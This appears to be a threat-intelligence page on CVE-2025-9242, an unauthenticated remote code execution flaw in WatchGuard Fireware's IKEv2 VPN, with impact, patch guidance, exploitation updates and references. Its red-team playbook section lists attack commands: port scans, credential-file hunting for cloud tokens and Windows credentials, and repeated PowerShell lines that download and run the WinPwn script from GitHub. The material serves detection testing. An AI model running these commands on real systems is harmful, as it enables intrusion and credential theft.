CVE-2025-9242
Overview
This vulnerability is an out-of-bounds write flaw in WatchGuard Fireware OS affecting the VPN components configured with dynamic gateway peers using IKEv2. The root cause is improper boundary checking during processing of VPN negotiation packets, leading to memory corruption. The flaw exists specifically in the handling of Mobile User VPN and Branch Office VPN protocols within Fireware OS versions 11.10.2 through 12.11.3 and 2025.1.
Vulnerability Description
An Out-of-bounds Write vulnerability in WatchGuard Fireware OS may allow a remote unauthenticated attacker to execute arbitrary code. This vulnerability affects both the Mobile User VPN with IKEv2 and the Branch Office VPN using IKEv2 when configured with a dynamic gateway peer.This vulnerability affects Fireware OS 11.10.2 up to and including 11.12.4_Update1, 12.0 up to and including 12.11.3 and 2025.1.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code with system-level privileges on affected Fireware OS devices. This enables full compromise of the VPN gateway, allowing interception, manipulation, or disruption of VPN traffic and potentially lateral movement within the network. No user interaction or credentials are required, increasing the risk of widespread exploitation and severe business impact including data breaches and network compromise.
Solution
Apply the patches provided by WatchGuard as detailed in advisory WGSA-2025-00015 available at https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00015. Specifically, update Fireware OS to versions later than 11.12.4_Update1, 12.11.3, or 2025.1. Follow vendor instructions for patch deployment to ensure the vulnerability is fully mitigated. No alternative workarounds are documented in the advisory.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The identified vulnerability within WatchGuard Fireware OS is characterized as an out-of-bounds write issue, which can lead to arbitrary code execution by remote unauthenticated attackers. This flaw arises from improper handling of memory during the processing of certain requests, particularly in the Mobile User VPN with IKEv2 and the Branch Office VPN when configured with a dynamic gateway peer. The affected versions span from 11.10.2 to 11.12.4_Update1, as well as 12.0 through 12.11.3 and the 2025.1 release. The nature of this vulnerability allows attackers to manipulate memory allocation, potentially leading to the execution of malicious code, which can compromise the integrity and confidentiality of the affected systems.
Attack vectors associated with this vulnerability are particularly concerning due to the remote and unauthenticated nature of the exploitation. An attacker could initiate a specially crafted request to the VPN services, triggering the out-of-bounds write condition. This could allow them to overwrite critical memory areas, leading to the execution of arbitrary code. Scenarios may include targeting organizations that utilize these VPN services for remote access, thereby enabling attackers to gain unauthorized access to sensitive internal networks. The implications of such an attack could range from data exfiltration to the deployment of ransomware or other malicious software, significantly disrupting business operations.
The real-world impact of this vulnerability is profound, particularly for organizations relying on WatchGuard Fireware OS for secure communications. Given the high CVSS score of 9.8, the risk associated with exploitation is categorized as critical. Organizations may face severe consequences, including financial losses, reputational damage, and potential legal ramifications due to data breaches. The ability for attackers to execute arbitrary code remotely without authentication poses a significant threat, especially for businesses that handle sensitive information or operate in regulated industries. The potential for widespread exploitation underscores the urgency for organizations to address this vulnerability promptly.
To detect and mitigate the risks associated with this vulnerability, organizations should adopt a multi-faceted approach. First and foremost, immediate patching of affected Fireware OS versions is crucial. Regular updates and vulnerability assessments should be part of an organization's security posture to ensure that all systems are running the latest, secure versions. Additionally, implementing network segmentation can help limit the exposure of critical systems to potential attacks. Intrusion detection systems (IDS) should be configured to monitor for unusual traffic patterns indicative of exploitation attempts. Furthermore, organizations should conduct thorough security training for employees to recognize potential phishing attempts or social engineering tactics that could be used to facilitate an attack.
In conclusion, the out-of-bounds write vulnerability in WatchGuard Fireware OS represents a significant threat to organizations utilizing this technology for secure communications. The potential for remote code execution by unauthenticated attackers necessitates immediate attention and action. By prioritizing timely updates, employing robust detection mechanisms, and fostering a culture of security awareness, organizations can mitigate the risks associated with this critical vulnerability and protect their assets from malicious actors.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2025-9242, indicating that exploitation attempts targeting vulnerable WatchGuard Fireware OS instances are emerging in the wild. This shift from theoretical risk to active targeting elevates the urgency for defenders monitoring affected environments. Although no ransomware groups have yet been linked to these exploitation attempts, the critical severity and remote unauthenticated attack vector position this vulnerability as a high-priority concern. The EPSS score remains high and stable, reinforcing the likelihood of continued exploitation pressure. The absence of publicly available proof-of-concept exploits suggests that threat actors may be leveraging undisclosed or custom-developed tools, increasing the challenge for detection and response teams. Consequently, the threat landscape surrounding CVE-2025-9242 has intensified, warranting heightened vigilance and prioritization within security operations.
Update 2 — June 23, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-9242, as evidenced by a significant uptick in telemetry signals and a corresponding rise in the Exploit Prediction Scoring System (EPSS) score. This upward trend reflects growing adversary interest and potentially increased operational activity leveraging this critical out-of-bounds write vulnerability in WatchGuard Fireware OS. Although no new public proof-of-concept exploits have surfaced, the elevated EPSS and detection frequency suggest that threat actors may be refining or deploying custom exploit tools in the wild. This development heightens the urgency for defenders to anticipate more frequent and sophisticated intrusion attempts exploiting this vulnerability. Consequently, the threat level associated with CVE-2025-9242 has intensified, underscoring its prioritization within vulnerability management and incident response frameworks.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Watchguard | Fireware | All |
cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:*
|
|
|
Watchguard | Fireware | All |
cpe:2.3:o:watchguard:fireware:*:*:*:*:*:*:*:*
|
|
|
Watchguard | Fireware | 2025.1 |
cpe:2.3:o:watchguard:fireware:2025.1:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
watchtowrlabs/watchTowr-vs-WatchGuard-CVE-2025-9242
|
watchtowrlabs | 13 | 5 | 2025-10-01 | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-9242 |
| watchguard.com |
GitHub CVE
|
https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00015 |
| github.com |
NVD API
Exploit
|
https://github.com/watchtowrlabs/watchTowr-vs-WatchGuard-CVE-2025-9242/blob/main/watchTowr-vs-WatchGuard-CVE-2025-9242.py |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-9242 |